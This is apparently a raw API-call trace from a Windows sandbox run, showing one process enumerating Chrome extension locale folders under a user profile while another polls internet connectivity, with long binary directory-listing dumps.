\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:23,098 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:23,098 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:23,178 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\sl\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:23,178 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xd0\xdb\xf9h\xe0\x91\xcf\x01p&@i\xe0\x91\xcf\x01\x00c\xfbh\xe0\x91\xcf\x01\x00c\xfbh\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00c\xfbh\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\xf5\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:23,178 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:23,178 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:23,258 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\sr\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:23,258 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00c\xfbh\xe0\x91\xcf\x01p&@i\xe0\x91\xcf\x010\xea\xfch\xe0\x91\xcf\x010\xea\xfch\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\xea\xfch\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01 \x01\x00\x00\x00\x00\x00\x00\x10\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:23,258 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:23,258 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:23,268 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:23,268 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:23,268 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:23,268 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:23,268 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:23,338 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\sv\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:23,338 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00`q\xfeh\xe0\x91\xcf\x01p&@i\xe0\x91\xcf\x01`q\xfeh\xe0\x91\xcf\x01`q\xfeh\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00`q\xfeh\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\x00\x88\xa6i\xe0\x91\xcf\x01\xe2\x00\x00\x00\x00\x00\x00\x00\xe8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:23,338 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:23,338 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:23,418 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\th\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:23,418 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x90\xf8\xffh\xe0\x91\xcf\x01@\x9f>i\xe0\x91\xcf\x01\x90\xf8\xffh\xe0\x91\xcf\x01\x90\xf8\xffh\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\xf8\xffh\xe0\x91\xcf\x010\x0f\xa8i\xe0\x91\xcf\x010\x0f\xa8i\xe0\x91\xcf\x010\x0f\xa8i\xe0\x91\xcf\x01\x10\x01\x00\x00\x00\x00\x00\x00\x10\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:23,418 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:23,418 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:23,498 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\tr\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:23,498 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xc0\x7f\x01i\xe0\x91\xcf\x01@\x9f>i\xe0\x91\xcf\x01\xf0\x06\x03i\xe0\x91\xcf\x01\xf0\x06\x03i\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x06\x03i\xe0\x91\xcf\x010\x0f\xa8i\xe0\x91\xcf\x010\x0f\xa8i\xe0\x91\xcf\x010\x0f\xa8i\xe0\x91\xcf\x01\xe7\x00\x00\x00\x00\x00\x00\x00\xe8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:23,498 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:23,498 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:23,578 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\uk\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:23,578 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00 \x8e\x04i\xe0\x91\xcf\x01@\x9f>i\xe0\x91\xcf\x01 \x8e\x04i\xe0\x91\xcf\x01 \x8e\x04i\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x8e\x04i\xe0\x91\xcf\x010\x0f\xa8i\xe0\x91\xcf\x010\x0f\xa8i\xe0\x91\xcf\x010\x0f\xa8i\xe0\x91\xcf\x01\x0e\x01\x00\x00\x00\x00\x00\x00\x10\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:23,578 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:23,578 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:23,749 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\vi\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:23,749 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00P\x15\x06i\xe0\x91\xcf\x01@\x9f>i\xe0\x91\xcf\x01\x80\x9c\x07i\xe0\x91\xcf\x01\x80\x9c\x07i\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x9c\x07i\xe0\x91\xcf\x010\x0f\xa8i\xe0\x91\xcf\x010\x0f\xa8i\xe0\x91\xcf\x010\x0f\xa8i\xe0\x91\xcf\x01\x07\x01\x00\x00\x00\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:23,749 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:23,749 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:23,829 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\zh_CN\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:23,829 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0\xaa i\xe0\x91\xcf\x01@\x9f>i\xe0\x91\xcf\x01\xe0\xaa i\xe0\x91\xcf\x01\xe0\xaa i\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\xaa i\xe0\x91\xcf\x010\x0f\xa8i\xe0\x91\xcf\x010\x0f\xa8i\xe0\x91\xcf\x010\x0f\xa8i\xe0\x91\xcf\x01\xda\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:23,829 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:23,829 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\x102\x0ci\xe0\x91\xcf\x01\x10\x18=i\xe0\x91\xcf\x01\xd0N\x12i\xe0\x91\xcf\x01\xd0N\x12i\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00z\x00h\x00_\x00T\x00W\x00 |
SUCCESS | 0x00000000 | |
| 07:44:23,829 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:23,909 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\zh_TW\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:23,909 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x102\x0ci\xe0\x91\xcf\x01\x10\x18=i\xe0\x91\xcf\x01\xd0N\x12i\xe0\x91\xcf\x01\xd0N\x12i\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0N\x12i\xe0\x91\xcf\x010\x0f\xa8i\xe0\x91\xcf\x010\x0f\xa8i\xe0\x91\xcf\x010\x0f\xa8i\xe0\x91\xcf\x01\xe0\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:23,909 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:23,909 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:23,909 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:23,909 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:23,909 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:23,989 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\*.* |
SUCCESS | 0x0016be10 | |
| 07:44:23,989 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c8 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xb0b\x83i\xe0\x91\xcf\x01@\x17Jy\xe0\x91\xcf\x01@\x17Jy\xe0\x91\xcf\x01@\x17Jy\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00bjmhmf\x00\x00\x00\x00\x00\x00\x00\x00@g\x89k\xe0\x91\xcf\x01\x00P\xf1k\xe0\x91\xcf\x01\x00\xdd\xd8k\xe0\x91\xcf\x01\x00P\xf1k\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x12\x000\x000\x000\x00~\x001\x00.\x002\x000\x00_\x00\x00\x00\x00\x00\x00\x000\x00.\x000\x00.\x000\x00.\x002\x000\x00_\x000\x00 |
SUCCESS | 0x00000000 | |
| 07:44:23,989 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:24,069 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:24,069 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:24,069 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:24,069 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:24,069 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:24,089 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\*.* |
SUCCESS | 0x0016be48 | |
| 07:44:24,089 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@g\x89k\xe0\x91\xcf\x01\x00P\xf1k\xe0\x91\xcf\x01\x00\xdd\xd8k\xe0\x91\xcf\x01\x00P\xf1k\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 e = 0p\x00\x00\x00\x00\x00\x00\x00p\xee\x8ak\xe0\x91\xcf\x01\xd0U\xd7k\xe0\x91\xcf\x01\xd0U\xd7k\xe0\x91\xcf\x01\xd0U\xd7k\xe0\x91\xcf\x01\xf7\x14\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00 \x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x001\x002\x008\x00.\x00p\x00n\x00g\x00\x00\x00\x00\x00p\x00\x00\x00\x00\x00\x00\x00p\xee\x8ak\xe0\x91\xcf\x01\x00\xdd\xd8k\xe0\x91\xcf\x01\x00\xdd\xd8k\xe0\x91\xcf\x01\x00\xdd\xd8k\xe0\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:24,089 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:24,169 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\*.* |
SUCCESS | 0x0016be80 | |
| 07:44:24,169 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00\x84\x8fk\xe0\x91\xcf\x01`x\xc3k\xe0\x91\xcf\x01`x\xc3k\xe0\x91\xcf\x01`x\xc3k\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00_\x00T\x00W\x00h\x00\x00\x00\x00\x00\x00\x000\x0b\x91k\xe0\x91\xcf\x01\xb0*\xcek\xe0\x91\xcf\x010\x0b\x91k\xe0\x91\xcf\x010\x0b\x91k\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00a\x00r\x006\x00-\x003\x00h\x00\x00\x00\x00\x00\x00\x00`\x92\x92k\xe0\x91\xcf\x01\xb0*\xcek\xe0\x91\xcf\x01`\x92\x92k\xe0\x91\xcf\x01`\x92\x92k\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:44:24,169 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:24,249 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\ar\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:24,249 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x000\x0b\x91k\xe0\x91\xcf\x01\xb0*\xcek\xe0\x91\xcf\x010\x0b\x91k\xe0\x91\xcf\x010\x0b\x91k\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\x0b\x91k\xe0\x91\xcf\x01\x00\xdd\xd8k\xe0\x91\xcf\x01\x00\xdd\xd8k\xe0\x91\xcf\x01\x00\xdd\xd8k\xe0\x91\xcf\x01G\x01\x00\x00\x00\x00\x00\x00H\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:24,249 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:24,249 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:24,329 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\_locales\bg\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:24,329 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00`\x92\x92k\xe0\x91\xcf\x01\xb0*\xcek\xe0\x91\xcf\x01`\x92\x92k\xe0\x91\xcf\x01`\x92\x92k\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00`\x92\x92k\xe0\x91\xcf\x01\x00\xdd\xd8k\xe0\x91\xcf\x01\x00\xdd\xd8k\xe0\x91\xcf\x01\x00\xdd\xd8k\xe0\x91\xcf\x01g\x01\x00\x00\x00\x00\x00\x00h\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:24,329 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:24,329 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
